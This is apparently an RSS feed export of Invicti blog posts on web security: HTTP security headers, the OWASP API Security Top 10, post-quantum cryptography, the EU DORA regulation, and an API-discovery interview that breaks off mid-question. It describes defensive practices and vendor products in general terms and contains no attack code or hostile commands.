Invicti https://www.invicti.com/ Web Application and API Security For Enterprise Fri, 06 Sep 2024 11:56:41 +0000 en-US hourly 1 https://cdn.invicti.com/app/uploads/2022/03/08125959/cropped-favicon-32x32.png Invicti https://www.invicti.com/ 32 32 HTTP security headers: An easy way to harden your web applications https://www.invicti.com/blog/web-security/http-security-headers/ Fri, 06 Sep 2024 11:56:39 +0000 https://www.invicti.com/blog/uncategorized/http-security-headers/ Modern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right.

The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.

]]>
What are HTTP security headers?

HTTP security headers are those HTTP headers that are related specifically to security, exchanged between a client (like a web browser) and a server to define the security of HTTP communication. These include dedicated security headers and several others that can indirectly affect privacy and security.

Setting the right security headers in your web application, API, and web server settings can greatly improve the resilience of your applications against entire classes of attacks, including cross-site scripting (XSS) and clickjacking attacks. This post highlights the most important headers and shows how to use tools such as DAST to automatically check for their presence and correctness. For an in-depth discussion of available security headers, see our white paper on HTTP security headers.

How HTTP security headers improve your web application security posture

In the realm of web application security testing, vulnerabilities are often understood to be exploitable security flaws that originate in application code and need to be fixed there. That usually means you’re fixing one vulnerability in one app, often affecting just in one place in that app.

HTTP security headers operate at the runtime level and provide a much broader layer of security. By restricting behaviors permitted by the browser and server once the web application is running, security headers can block entire classes of attacks, which makes them extremely powerful. Implementing the right headers in the right way is a crucial aspect of any best-practice application setup—but first you need to choose the ones that make the biggest difference, and then you need to implement and test them all across your application environment to balance security and functionality.

Keeping your HTTP security headers healthy with DAST

As with other web technologies, HTTP protocol headers come and go depending on current specifications and browser vendor support. Security research, in particular, moves much faster than official tech standards, so de facto standards can arise and fall out of favor quite independently of the official specs. Headers that were widely supported a few years ago are deprecated today and replaced by something else. That’s a lot to keep up with.

On top of that, security headers can be set in server config but also in the application itself. In a large app environment with hundreds of servers running thousands of sites, applications, and APIs, manually checking and maintaining security headers everywhere they’re being set is completely unrealistic. Fortunately, that’s a natural job for automated vulnerability scanners. Leading tools such as Invicti’s DAST solutions will automatically check for the presence and correctness of HTTP security headers, providing clear recommendations according to current security best practices.

The most important HTTP security headers

First up are the two best-known HTTP response headers that any modern web application will be setting. Apart from ruling out entire classes of web attacks, both are now also a practical necessity.

Strict-Transport-Security

The HTTP Strict Transport Security header (HSTS) is set on the server and enforces the use of encrypted HTTPS connections instead of plain-text HTTP communication. A typical HSTS header might look like this:

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

This informs visiting web browsers that the site along with all its subdomains only communicates over SSL/TLS and the browser should only access it over HTTPS for the next two years (the max-age value in seconds). The preload directive indicates that the site is present on a global list of HTTPS-only sites. The purpose of preloading is to speed up page loads and also eliminate the risk of man-in-the-middle (MITM) attacks when a site is visited for the first time without encryption.

Invicti’s DAST scanner checks if HSTS is enabled and correctly configured.

Content-Security-Policy

The Content Security Policy header (CSP) is the Swiss Army knife of HTTP security headers. It lets you precisely control permitted content sources and many other content parameters. Because you can also limit script sources, it is the recommended way to protect your sites and applications against XSS attacks. Here’s a basic CSP header that only allows assets from the local origin:

Content-Security-Policy: default-src 'self'

Some of the other directives include script-src, style-src, object-src, and img-src to specify permitted sources for scripts, CSS stylesheets, objects, and images, respectively. For example, if you specify script-src 'self', you are restricting scripts to the local origin but can still load other content from external origins.

Invicti’s DAST scanner checks if the CSP header is present.

Other HTTP security headers

While not as critical to implement as CSP and HSTS, the additional headers below can also help you harden your web applications with relatively little effort (at least compared to getting the same effect purely in application code).

X-Content-Type-Options

When included in server responses, this header forces web browsers to strictly follow the MIME types specified in Content-Type headers, without attempting any content type detection if the Content-Type header is missing. This is intended to protect websites from cross-site scripting attacks that abuse MIME sniffing to supply malicious code masquerading as a non-executable MIME type. The header has just one directive to block sniffing:

 X-Content-Type-Options: nosniff

Invicti’s DAST scanner checks if Content-Type headers are set and X-Content-Type-Options: nosniff is present.

Headers related to cross-origin resource sharing (CORS)

Many web apps need to work with some external resources that require exceptions to the default same-origin policy (SOP) settings applied by modern browsers. Several headers exist that let you selectively relax SOP restrictions without compromising overall security:

  • Access-Control-Allow-Origin: Specifies a list of permitted domains for cross-origin access. The value can be one or more domains and subdomains, or * to explicitly disable CORS restrictions for all sites.
  • Cross-Origin-Opener-Policy (COOP): Specifies whether a top-level document can share browsing context with cross-origin documents. Use same-origin to disallow such access.
  • Cross-Origin-Resource-Policy (CORP): Specifies domains that are permitted to include the current resource. Use same-site to disallow all external origins.
  • Cross-Origin-Embedder-Policy (COEP): As for CORP but specifically related to embedding resources on the current page. Use require-corp to only embed resources from origins permitted by the CORP header.

Note that in practice, there will be overlap between these and other security headers and, in many cases, there will be more than one way to get the result you need.

Fetch metadata headers

This relatively young set of client-side headers allows the browser to inform the server about application-specific HTTP request attributes. Four headers currently exist:

  • Sec-Fetch-Site: Specifies the intended relationship between the initiator and target origin
  • Sec-Fetch-Mode: Specifies the intended request mode
  • Sec-Fetch-User: Specifies if the request was triggered by the user
  • Sec-Fetch-Dest: Specifies the intended request destination

When supported by both the server and the browser, these headers give the server additional context on intended application behaviors and business logic to help identify and block suspicious requests.

Related HTTP headers to improve privacy and security

These final items are not strictly HTTP security headers but do provide additional control over data security and privacy.

Referrer-Policy

Controls how much referrer information the browser should reveal to the web server (if any). Typical usage is:

Referrer-Policy: origin-when-cross-origin

With this setting, the browser will only reveal full referrer information (including the URL) for same-origin requests. For all other requests, only the origin will be shared.

Invicti reports missing Referrer-Policy headers with a Best Practice severity level.

Cache-Control

Lets you control caching for specific web pages. Many directives are available, but the most common usage is simply:

Cache-Control: no-store

This prevents any caching of the server response, which can be useful for ensuring that confidential data is not retained in any caches. You can use other available directives to fine-tune the desired caching behavior, including expiration time.

Clear-Site-Data

To ensure that confidential information from your application is not stored by the browser after a user logs out, you can set the Clear-Site-Data header:

Clear-Site-Data: "*" 

This value will clear all browsing data related to the site. The cache, cookies, and storage directives are also available to give you more fine-grained control over what is cleared. Note this header is not universally supported.

Permissions-Policy (previously Feature-Policy)

Allows you to define permissions for specific browser features and APIs on the current page. It can be used to control application functionality, but the main use case is to restrict access to privacy-related features like microphone, camera, or geolocation APIs. To disallow access to all three of these, specify:

Permissions-Policy: microphone=(), camera=(), geolocation=()

Several dozen directives are available—see the Permissions-Policy documentation on MDN for a full list.

Examples of deprecated HTTP security headers

As already mentioned, it was common in the past for dominant browsers to introduce new headers as temporary fixes for specific security issues. As web technologies became more standardized and organized, many of these were deprecated, often after only a few years. While they shouldn’t be used in modern applications, these deprecated headers give a fascinating insight into the history and relentless pace of changes in web technology.

(Deprecated) X-Frame-Options

The X-Frame-Options header was introduced way back in 2008 in Microsoft Internet Explorer to provide protection against cross-site scripting attacks involving HTML iframes before more standardized headers were adopted. To completely prevent the current page from being loaded into iframes, you would specify:

 X-Frame-Options: deny

Another useful value was x-frame-options: sameorigin to only allow loading into iframes with the same origin. You could also specify allow-from to list specific permitted URLs. This header has been deprecated since the adoption of the frame-ancestors CSP directive to control iframe security.

(Deprecated) X-XSS-Protection

As the name suggests, the X-XSS-Protection header was introduced to protect against JavaScript injection attacks, i.e. cross-site scripting. The usual syntax was:

 X-XSS-Protection: 1; mode=block

Created for browsers equipped with XSS filters, this non-standard header was intended as a way to control that filtering functionality. Modern browsers no longer use XSS filtering due to the many possibilities of XSS filter evasion, so this header is now deprecated, making CSP directives your main XSS defense.

(Deprecated) Public-Key-Pins

HTTP Public Key Pinning (HPKP) was introduced in Google Chrome and Firefox to counteract certificate spoofing. HPKP was a complicated mechanism that involved the server presenting clients with cryptographic hashes of valid certificate public keys for future communication. A typical header would be something like:

Public-Key-Pins: pin-sha256="cUPcTAZWKaASuYWhhneDttWpY3oBAkE3h2+soZS7sWs="; max-age=5184000 

In practice, public key pinning proved too complicated to use. Worse, if configured incorrectly, the header could completely disable website access for the time specified in the max‑age parameter (two months, in the example above). The header was deprecated in favor of certificate transparency logs and the Expect-CT header—but that one didn’t last long, either…

(Deprecated) Expect-CT

With HPKP gone, the recommended way to prevent website certificate spoofing was to use the Expect-CT header to indicate that only new certificates added to Certificate Transparency logs should be accepted. This proved another dead end, and Mozilla now recommends avoiding the header and removing it wherever possible. A typical header looked something like this:

Expect-CT: max-age=86400, enforce, report-uri="https://example.com/report" 

The enforce directive instructed clients to refuse connections that violate the Certificate Transparency policy. The optional report-uri directive indicated a location for reporting connection failures.

Security headers in action with Sven Morgenroth

It’s one thing to read about security headers, but seeing them in action is gives you a whole new appreciation of how they work (and when they don’t work). Invicti Staff Security Engineer Sven Morgenroth joined Paul Asadoorian on Paul’s Security Weekly #652 to describe and demonstrate various HTTP headers related to security. Watch the full video interview and demo:

Keep track of your HTTP security headers with Invicti

HTTP security headers can be an easy way to improve web security and often don’t require changes to the application itself, so it’s always a good idea to use the most current headers. However, because browser vendor support for HTTP headers can change so quickly, it’s hard to keep everything up-to-date, especially if you’re working with hundreds of websites. 

To help you keep up and stay secure, Invicti provides vulnerability checks that include testing for recommended HTTP security headers and other misconfigurations. Invicti checks if a header is present and correctly configured, and provides clear recommendations to ensure that your web applications always have the best protection.

Start testing for security misconfigurations today

 


Frequently asked questions

What are the main HTTP security headers for improving website security?

The two most important security headers are Content-Security-Policy (CSP) to define permitted content types and Strict-Transport-Security (HSTS) to enforce HTTPS connections. It’s also common to set X-Content-Type-Options to prevent MIME type sniffing by browsers.
 
Read our detailed white paper on HTTP security headers.

How do HTTP security headers improve web application resilience?

HTTP security headers play a crucial role in web security by mitigating risks associated with common attacks such as cross-site scripting (XSS), frame injection, and clickjacking. When set up correctly, they allow website owners to prevent entire classes of web application attacks already at the configuration level.
 
Learn more about cross-site scripting vulnerabilities and attacks.

How can website owners implement and configure HTTP security headers to improve their web security posture?

To effectively implement and configure HTTP security headers, both website owners and developers need to understand the place and purpose of each header and apply configurations tailored to their specific security requirements. This involves setting response headers on the web server (though some can also be set in application code) and then regularly testing for header misconfigurations using an automated scanner.
 
Learn how to set up Content-Security-Policy (CSP) headers and how they work.

The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.

]]>
The OWASP API Security Top 10 demystified https://www.invicti.com/blog/web-security/owasp-api-security-top-10-demystified/ Thu, 29 Aug 2024 15:07:05 +0000 https://www.invicti.com/?p=55733 Dazed and confused by the OWASP API Security Top 10 categories? We decided to break them down into plain language to have a bit of fun but also to better appreciate the core problems hiding behind the precise technical definitions.

The post The OWASP API Security Top 10 demystified appeared first on Invicti.

]]>
Useful as they are, OWASP Top 10 lists are not renowned for being clear and readable, and definitely not for being fun. While we do have a serious post discussing the methodology, categories, and missed opportunities of the OWASP API Security Top 10 for 2023, this time we thought we’d take a more light-hearted look at the big ten for APIs. And this is not (just) goofing around—by cutting through the precise formal language, we can hopefully get a better feel for each API risk category.

API risk #1: Ask and you shall receive

API1:2023 Broken Object-Level Authorization (aka BOLA aka IDOR)

The whole point of APIs is to provide automated access to application data and functionality. Setting up an API endpoint to serve up the details of a customer account is easy—the big challenge is to make sure that data is only accessible to authorized users and systems. If something (the “object”) in your app can be freely accessed by anyone just because they know how to request the right URL and object ID (like a customer number), you get data breaches like the Optus hack.

API risk #2: You don’t need to see his identification

API2:2023 Broken Authentication

With APIs, as in life, proving your identity is the first thing you should be asked to do before doing anything important. If this authentication mechanism is weak or easy to bypass, malicious actors can get in without any questions asked, using methods ranging from brute-force credential stuffing to tampering with a JWT token to bypass signatures. And once they are in, the remaining top 9 risks are up for grabs.

API risk #3: Promise me you won’t look inside

API3:2023 Broken Object Property-Level Authorization

With most business applications, it’s pretty obvious that different users need different levels of data access. If you have a customer account in the system, some of your staff may only need basic contact information, others will also be trusted with financial information, while an admin user may have access to everything plus credential management. Enforcing this for API access is especially difficult, leading to situations where an attacker who gets access to a customer account object also gets access to all the data for that account.

API risk #4: I don’t expect you to talk, Mr. API. I expect you to die

API4:2023 Unrestricted Resource Consumption

Data breaches tend to make more headlines, but attackers don’t always need your API to talk—knocking it offline along with the whole app is often enough. Denial of service (DoS) attacks are among the crudest yet most common ways to target an API, made all the easier by APIs being specifically designed for silent and automated access. Accepting and processing every incoming request without enforcing any limits leaves an API vulnerable to resource exhaustion and its owner exposed to excessive operating costs.

API risk #5: Are they allowed to do that?

API5:2023 Broken Function-Level Authorization

API endpoints expose not only data but also operations on that data. While risk #3 was related to attackers getting all-or-nothing access to data objects, the same applies to permitted operations. REST APIs, in particular, commonly expose methods that include. GET, PUT, and DELETE. If anybody who can read data through a regular GET request is also able to delete it by just manually changing GET to DELETE in the request header, you are clearly asking for trouble. The same goes for unsecured access to things like admin operations.

API risk #6: Hey, that’s cheating!

API6:2023 Unrestricted Access to Sensitive Business Flows

Abusing automated access to certain operations might have serious business consequences, even when it’s not technically a security risk. Common examples include automatic auction bidding, buying out and then reselling high-demand items like tickets, or flooding a reservation system with requests to deny it to legitimate users. So while it might not knock the service offline like a DoS, it can certainly cause business disruption and material losses. Plus it’s cheating.

API risk #7: Give them a fake address; they never check anyway

API7:2023 Server-Side Request Forgery (SSRF)

Fetching resources from an external site is a common practice in web development. When working through APIs, it is equally common to get the specific resource address (URL) from an incoming request. Without careful validation to catch any unexpected data in that URL, an attacker could send you the URL of a malicious external resource, including malicious code. Even worse, they could also request a sensitive internal resource—and because the request is coming from your API server, they could indirectly access internal systems via your API.

API risk #8: Amazing, that’s the same code I have on my luggage!

API8:2023 Security Misconfiguration

Setting up a production API to work correctly is not easy, and making it secure is even harder. Even a single security misconfiguration anywhere in this multi-layered technology puzzle could leave attackers with a way to access API data or operations. Examples include unpatched products or software components anywhere in the tech stack, excessive permissions at any level of that stack (especially for cloud storage permissions), and weak security (such as gaps in encryption) at any stage of API request processing.

API risk #9: New building, same unlocked fence gate

API9:2023 Improper Inventory Management

When an API changes, it’s common practice to set up the new version alongside the old one to make sure existing systems that rely on that API still work until the transition is complete. Without careful inventory management, those old APIs can easily be overlooked and forgotten, remaining accessible to attackers. And because they are old and abandoned, they are less likely to include the latest security updates and might not be monitored and protected to the same level as production APIs, giving malicious actors plenty of time and opportunity to find a way in. This is why API discovery is such a big deal.

API risk #10: It’s always a friend of a friend that causes trouble

API10:2023 Unsafe Consumption of APIs

For the most part, APIs don’t interact with humans but with other APIs—and those, by design and unlike humans, should behave according to spec. This may create a sense of implicit trust, leading developers to unquestioningly accept and pass on data from a familiar third-party API, especially one operated by a well-known company. If attackers compromise that API or manage to slip malicious data into one of its data sources, blindly trusting results received from that API could leave your own application vulnerable or compromised.

Final thoughts: Are you talking to me?

When put into everyday language, many of the top 10 API-related security risks might seem simple, even mundane—mostly different ways of letting attackers access things they clearly have no business accessing. The challenge with APIs is that they act as shortcuts to the internals of your application. Unless those shortcuts are carefully planned from the earliest stages of application design and development, they can bypass access controls that might be present in the application.

It’s always tempting to treat any OWASP Top 10 as a security checklist, but the goal of the API Security Top 10 is clearly stated in its introduction: “to educate those involved in API development and maintenance, for example, developers, designers, architects, managers, or organizations.” You’ll note that security folks aren’t listed—because API security really starts way before they come in with testing and protection.

The main takeaway from the OWASP API Security Top 10 is that, in a perfect world, secure APIs should always start with secure application design. In the real world, though, APIs are rarely perfectly designed, implemented, or tracked, so tools for API discovery and API security testing are a vital part of any application security toolbox.

Learn more about Invicti API Security and check out our free (and ungated) white paper: API Vulnerability Testing in the Real World.

The post The OWASP API Security Top 10 demystified appeared first on Invicti.

]]>
What’s the big deal with post-quantum cryptography? https://www.invicti.com/blog/web-security/whats-the-deal-with-post-quantum-cryptography-pqc/ Fri, 16 Aug 2024 15:22:07 +0000 https://www.invicti.com/?p=55596 Even though usable quantum computers don’t exist yet, they could (if built) be used to break today’s standard encryption methods. To guard against this potential threat, NIST has developed and published several standards for post-quantum cryptography (PQC). This post examines why PQC is needed and how it will be implemented.

The post What’s the big deal with post-quantum cryptography? appeared first on Invicti.

]]>
If you follow IT and cybersecurity news, you’ll be familiar with mentions of quantum computing, usually followed by something about post-quantum cryptography. In fact, just recently, NIST announced the formal approval of the first set of PQC standards, which will doubtless fuel more quantum apocalypse predictions in the news. Let’s take a very high-level look at all this quantum cryptography stuff to see what the fuss is about, what it all means in practice, and who will be affected by PQC migrations.

A very brief intro to cryptography (and breaking it)

Cryptography is the foundation of data privacy, especially on the web. Seeing https:// or a padlock in your address bar is a basic indicator that your connection is secured by encryption, meaning all the data you send and receive is scrambled using a cipher that only you and the recipient can decipher. Assuming everything is set up correctly, the only way to get at the original data is to break whatever cipher is being used. And even though they don’t yet exist outside of tiny experimental systems, quantum computers may, in theory, offer a way to break several fundamental modern ciphers.

That’s where the big scary stories originate—if somebody could build a working quantum computer, they might (in theory) be able to decrypt any communications sent on the modern web. While nobody has managed to build a practically usable quantum computer, and it’s not completely certain if that’s even possible, the mere theoretical possibility was enough to start a search for encryption methods that could resist such potential quantum attacks. Why the panic, you may wonder?

Getting quantum on decryption

When you connect to a site or app over HTTPS, your browser (app, phone, car, smart TV, router, you get the picture) and the server at the other end have to securely agree on how they will encrypt their communication and what encryption key to use. After that’s decided, they both have a secret key to encrypt their messages using whatever method they’ve negotiated. This part is called symmetric encryption (because they both use the same key) and is not vulnerable to quantum attacks.

The really critical and difficult part—and also the one that’s vulnerable—is securely encrypting and exchanging that key. This is done using public-key (asymmetric) cryptography based on one of several mathematical problems known to be extremely difficult (aka impractically slow) to solve. For existing schemes like RSA or Diffie-Hellman, doing the calculations to find a single key of secure length would take thousands of years using even the most powerful supercomputer. Except these problems are only difficult for a traditional computer—not a quantum one.

For this tiny specialized subset of problems, a full-scale quantum computer could be orders of magnitude faster than a traditional one and thus potentially provide a way to break the asymmetric part of encrypted communications to grab the secret symmetric key that decrypts your data. The same principle could be used to decrypt stored data gathered in the past or even forge digital signatures, wreaking havoc across the chains of trust that underpin our entire digital world. Even if the risk is still hypothetical, it was clearly a good idea to start thinking ahead for something better.

How a quantum computer could break public-key cryptography

A traditional computer is basically billions of on/off switches doing basic arithmetic really, really fast using ones and zeros. A quantum computer is built from subsystems called qubits where instead of just being on or off, each qubit can exist in a combination of states, additionally linked to the states of all the other qubits through quantum effects.

 

Using an approach called Shor’s algorithm, you can program a quantum computer to do certain calculations that can be used to break public-key encryption. Assuming the quantum computer works without errors or noise (and is big enough, and exists in the first place), these calculations would be much faster than on a traditional computer because all the qubits act together to check many solutions at once rather than doing individual arithmetic operations.

NIST standards for post-quantum cryptography algorithms

Cryptography relies on the principle that a theoretical weakness today could render an algorithm practically insecure in the future. Given what was known about the susceptibility of public-key cryptography to quantum decryption, the National Institute of Standards and Technology (NIST) was given the job of coordinating work on developing and standardizing replacement algorithms that would be resistant to attacks using quantum computers.

After several years and drafts, in August 2024, NIST published the final versions of three major PQC algorithms, each becoming an official Federal Information Processing Standard (FIPS):

A fourth standard, FIPS 206, is also in the works and should be finalized towards the end of 2024.

What does PQC mean in practice?

The entire web infrastructure was built around public-key cryptography as the foundation of trust and security, so swapping out those algorithms without breaking the internet will be no small undertaking. While nobody is setting a specific date, organizations such as CISA are leading the transition toward PQC, starting with critical infrastructure.

All this will happen under the hood of existing systems, so it should not directly affect end users, but it will mean a lot of work for everyone involved in the transition. The Department of Homeland Security has laid out a roadmap for that transition, and CISA has a dedicated PQC initiative to help guide those efforts. It’s reasonable to expect that other regulatory and industry bodies will follow suit, setting long-term goals to entirely move away from potentially vulnerable public-key algorithms in favor of their quantum-resistant counterparts. Some organizations are already migrating voluntarily as a best practice.

It is clear to everyone that PQC migration is a precautionary and future-proofing measure rather than any urgent reaction to demonstrated existing threats. Cryptographic history has shown time and time again that if a theoretical weakness is found in an algorithm or its implementation, there’s a very good chance it will be practically exploited in the future. Add to that the wildcard of secret security agencies worldwide that could always be years ahead in terms of tools and resources and, suddenly, the PQC initiative makes a lot of sense as a proactive security measure, especially when it comes to protecting critical infrastructure and national secrets.

For a more detailed discussion of PQC and the practical challenges of migration, see two papers from the UK National Cyber Security Centre (NCSC): Preparing for quantum-safe cryptography and Next steps in preparing for post-quantum cryptography.

The post What’s the big deal with post-quantum cryptography? appeared first on Invicti.

]]>
How the DORA framework mandates application security testing (and many other things) https://www.invicti.com/blog/web-security/dora-framework-mandates-application-security-testing/ Tue, 06 Aug 2024 20:01:58 +0000 https://www.invicti.com/?p=55363 The DORA framework presents both challenges and opportunities for entities in the European Union and beyond, calling for improvements to cybersecurity efforts for financial institutions. But what is DORA exactly, and why is it so important to pay attention to this regulation? We broke it all down for you, including how Invicti can help.

The post How the DORA framework mandates application security testing (and many other things) appeared first on Invicti.

]]>
The Digital Operational Resilience Act (DORA) is a European cybersecurity framework that was enacted in December 2022 and will be enforced starting in 2025. While created specifically to ensure the resilience of the European Union’s financial systems and institutions in the face of cyberattacks and other incidents involving ICT (information and communication technology), DORA applies not only to financial institutions but also to third-party providers of critical ICT services for the financial sector.

DORA vs. NIS2
The Network and Information Security Directive (NIS, currently NIS2) was the first EU regulation on cybersecurity, aimed at ensuring a high and common overall level of cybersecurity across EU member states. In contrast, DORA is focused specifically on operational resilience for the financial sector, thus complementing the more general security measures and controls specified in NIS2.

What is DORA?

DORA establishes a detailed and systematic regulatory framework for enhancing digital resilience and business continuity across the EU’s financial institutions in the face of mounting cyberattacks and other threats to availability and data integrity. Considering that modern financial systems are both entirely digital and heavily interconnected and interdependent, a common framework is crucial to minimize security risks, define region-wide ICT resilience levels, and enforce a unified system of oversight. The regulation states upfront that cybersecurity concerns span not only the entire sector but also external providers, supporting the case for an overarching EU-wide framework to ensure resilience:

Finance has not only become largely digital throughout the whole sector, but digitalisation has also deepened interconnections and dependencies within the financial sector and with third-party infrastructure and service providers.

DORA isn’t only for banks

It is estimated that DORA will apply to over 22,000 entities within the EU, covering not only financial institutions but also their ICT service providers. The scope is extremely wide, ranging from banks, investment firms, stock exchanges, and insurance companies to credit rating services, electronic money institutions, crowdfunding service providers, and many more.

The definition of ICT service provider is equally detailed, covering entities that provide “digital and data services provided through ICT systems to one or more internal or external users on an ongoing basis, including hardware as a service and hardware services which includes the provision of technical support via software or firmware updates by the hardware provider.” In other words, a wide variety of providers serving a wide variety of institutions will need to comply with DORA requirements.

While DORA is an EU regulation, ICT services often span the world, especially when it comes to cloud service providers. The framework takes this into account, explicitly allowing oversight to extend outside the Union:

Critical ICT third-party service providers should be able to provide ICT services from anywhere in the world, not necessarily or not only from premises located in the Union. (…) The Lead Overseer should therefore also be able to exercise its relevant oversight powers in third countries. Exercising those powers in third countries should allow the Lead Overseer to examine the facilities from which the ICT services or the technical support services are actually provided or managed by the critical ICT third-party service provider.

Three European Supervisory Authorities (ESAs) are charged with ensuring DORA compliance and helping to navigate its requirements: the European Banking Authority (EBA), the European Insurance and Occupational Pensions Authority (EIOPA), and the European Securities and Markets Authority (ESMA).

Key focus areas of DORA

  • ICT risk management: Financial entities must develop and maintain a comprehensive ICT risk management framework covering all aspects of ICT risk and resilience, from prevention and detection to response and recovery.
  • Incident reporting and management: DORA requires entities to promptly report ICT-related incidents to competent authorities, establish incident management processes, maintain detailed records of incidents, and conduct post-incident analyses.
  • Digital operational resilience testing: Crucially, DORA mandates operational resilience testing, including vulnerability scans and assessments, penetration testing, and gap analysis.
  • ICT third-party risk management: Contractual arrangements with third-party providers must include adequate cybersecurity measures for financial institutions, and regular audits and risk assessments are mandated to mitigate supply-chain risks.
  • Information sharing: Within their industry, financial organizations are required to exchange threat intelligence, define mechanisms to act on shared intelligence, and collaborate to enhance cybersecurity and resilience. 

Application security testing under DORA

Article 25 of DORA explicitly requires financial institutions to perform operational resilience testing of their ICT systems and tools, including vulnerability assessments and scans:

The digital operational resilience testing programme (…) shall provide (…) for the execution of appropriate tests, such as vulnerability assessments and scans, open source analyses, network security assessments, gap analyses, physical security reviews, questionnaires and scanning software solutions, source code reviews where feasible, scenario-based tests, compatibility testing, performance testing, end-to-end testing and penetration testing.

On top of that, centralized financial entities are specifically required to check for vulnerabilities before implementing any material change to their environments:

Central securities depositories and central counterparties shall perform vulnerability assessments before any deployment or redeployment of new or existing applications and infrastructure components, and ICT services supporting critical or important functions of the financial entity.

Considering that Article 26 then provides detailed requirements for obligatory threat-led penetration testing (TLPT), it is clear that DORA puts a heavy emphasis on regular and proactive testing to ensure financial organizations (and their ICT providers) are constantly evaluating the resilience of their applications and infrastructure.

How Invicti can help with DORA-mandated vulnerability scanning

The Digital Operational Resilience Act recognizes the interconnected and almost entirely digital nature of modern financial services, providing a comprehensive framework to minimize risk and maximize the resilience of the European financial sector in the face of mounting cyberattacks. 

With its test-driven platform for application and API security, including Predictive Risk Scoring and developer workflow integrations, Invicti can support financial institutions and their critical service providers in maintaining a proactive application security posture. Specifically, with continuous and accurate scanning solutions, Invicti helps solve requirements like those in Article 25 for performing vulnerability assessments before app deployment or redeployment. 

Want to see us in action? Get a demo here.  

The post How the DORA framework mandates application security testing (and many other things) appeared first on Invicti.

]]>
A voyage of discovery: Talking APIs with Frank Catucci and Dan Murphy https://www.invicti.com/blog/web-security/discovering-apis-interview-on-api-security/ Thu, 25 Jul 2024 15:02:28 +0000 https://www.invicti.com/?p=55214 API security is not just another box to tick but a critical part of any modern web application security program—if you can tame sprawl both for APIs and for the tools to find and test them. With Invicti now offering API discovery and vulnerability testing on a single platform, we sat down with Invicti’s CTO, Frank Catucci, and Chief Architect, Dan Murphy, to get the straight deal on API security directly from the experts.

The post A voyage of discovery: Talking APIs with Frank Catucci and Dan Murphy appeared first on Invicti.

]]>
What’s with all the buzz around API security? It’s becoming the top concern in application security as everyone is looking for faster and more reliable ways to secure their ever-growing API ecosystem. In Postman’s 2023 State of the API Report, 92% of respondents said they planned to increase their investments in APIs through 2024, which was up a massive 89% from the previous year. With API usage surging in software development, the line between APIs and applications is getting blurred, even as the security industry seems to treat them as completely separate things. 

Invicti recently released API discovery as part of its API Security product to help companies proactively address API-related risks in their application environments—but how does it all work under the hood and what makes it so special? We sat down for an interview with Invicti’s CTO, Frank Catucci, and Chief Architect, Dan Murphy, to clear up some API misconceptions, get closer to the technical side of building API security into an application security platform, and learn why it’s so important to treat APIs not as a separate entity but as an integral part of your attack surface. 

Frank Catucci, CTO and Head of Security Research
Dan Murphy, Chief Architect

This might seem a very obvious question to start with, but we’re seeing a lot of confusion about the differences between web applications and APIs. Especially in the security industry, you see a lot of dedicated API security products and vendors, so it sometimes feels like applications and APIs are two separate things with different security requirements. So what’s your practitioner’s eye view on applications vs. APIs in terms of architecture and, of course, security?

Dan Murphy: I come from a software engineering background and have spent a lot of my career thinking about APIs and web applications. But for folks who don’t necessarily have the same background, it’s sometimes hard to visualize, so it’s valid to ask: What is an API? How does it differ from a web app? And the answer is those things are a little blurred. Many modern applications are single-page applications (SPAs) that are simply invoking APIs as the user clicks around the app, so they’re a kind of hybrid of GUI and API. But with a traditional API, the thing on the other end of the request is not the web browser—it’s a piece of code. It may be some other web service invoking a webhook, some backend code or systems talking to each other, but it’s definitely not a human clicking inside of a browser.

 

One of the metaphors I like to use is that APIs are like the service elevators in buildings—people coming in the front door don’t see them, but they carry a lot of cargo behind the scenes, in this case all the internals of a web app. They don’t have a GUI that you can see and interact with. As in a real physical building, because those service APIs stay out of sight, it might not be clear if they’re being maintained and updated and kept secure.

Frank Catucci: That’s a great metaphor—APIs are the part of an application that does the heavy lifting in terms of data access and processing, but because they often aren’t visible, they can slip through testing and inventory efforts. So when people ask me what’s so special about APIs and API security, I like to start with an example of an API-based attack, such as the Optus data breach. Now that one was only possible because of an exposed API endpoint that let an attacker download the data of over 10 million customers without any authorization or authentication. 

 

So that Optus API, that service elevator if you like, would allow anybody who figured out the URL to enter a customer number and get confidential information back, and just enumerate those customers without any limits. It was what we call a shadow API that was never intended to be accessible in production, so it didn’t have all the security controls we’d normally expect. And because it was this heavy-lifting service elevator, it allowed the attacker to automatically exfiltrate huge amounts of data that they probably wouldn’t be able to get so easily if they were, say, manually hacking a web form.

Could you talk a bit more about shadow APIs? We see that term thrown around a lot, so what practical security problems come up with shadow APIs and, more generally, when doing API security rather than securing that more visible part of applications?

Dan: It’s pretty easy for an API, which doesn’t have a user-visible manifestation, to be ignored and go out of date. With a website, a developer or security person can often simply click around and they will quickly notice if anything looks really sketchy. In fact, this is what we do automatically with our Predictive Risk Scoring. But APIs are a lot more difficult for that kind of quick analysis because they don’t have anything that you can directly interact with. They are a catalog of invisible operations that could be performed on a computer. And if you don’t keep track of what’s in that catalog and who’s allowed to do these operations, you can get shadow APIs creeping in, like these hidden service doors that might not be easy to find but aren’t locked or monitored for when somebody rattles all the locks and eventually gets in.

Frank: I’m glad you used the word “catalog” because those catalogs or inventories are really the sticking point for API security. So, ideally, you want to keep track of all your API specifications. In reality, they can live in various places and formats, formal and informal. You might have your “official” specs in OpenAPI (aka Swagger) files or Postman collections or your API management system like MuleSoft or whatever else you’re using, but you can also have proxy exports from Fiddler or even a Burp or Invicti scan. I’ve even seen them in Excel sheets. But all of these essentially need to be inventoried and tracked in order to be able to secure them and understand exactly what their context and purpose is.

 

In a perfect world, you would have everything tracked in your API gateways and management systems. Reality, though, tends to get a bit messy, and most companies I’ve seen and spoken to use a mix of different methods and systems.

Dan: It’s the sprawl that gets you. The unknown APIs that are out there are the ones that I would consider to be the riskiest. And that really speaks to the need for discovery because APIs tend to be organic; they tend to be created to connect to business opportunities, and they don’t always have a ton of oversight when they’re deployed. If you think of APIs as data pipes, it’s very hard to swap out a pipe that has active users from a lot of different places, so just like a pipe, they tend to get buried under the street, they do their job, and people forget about them. Until they burst, of course!

You mentioned discovery, which is a key part of Invicti’s API Security product and of the approach we’re proposing to help organizations secure their applications, APIs included. You have both been deeply involved in the intense development effort to design and implement that feature. To close out, could you talk a little about how Invicti’s API discovery works under the hood and how it fits into the wider API security picture?

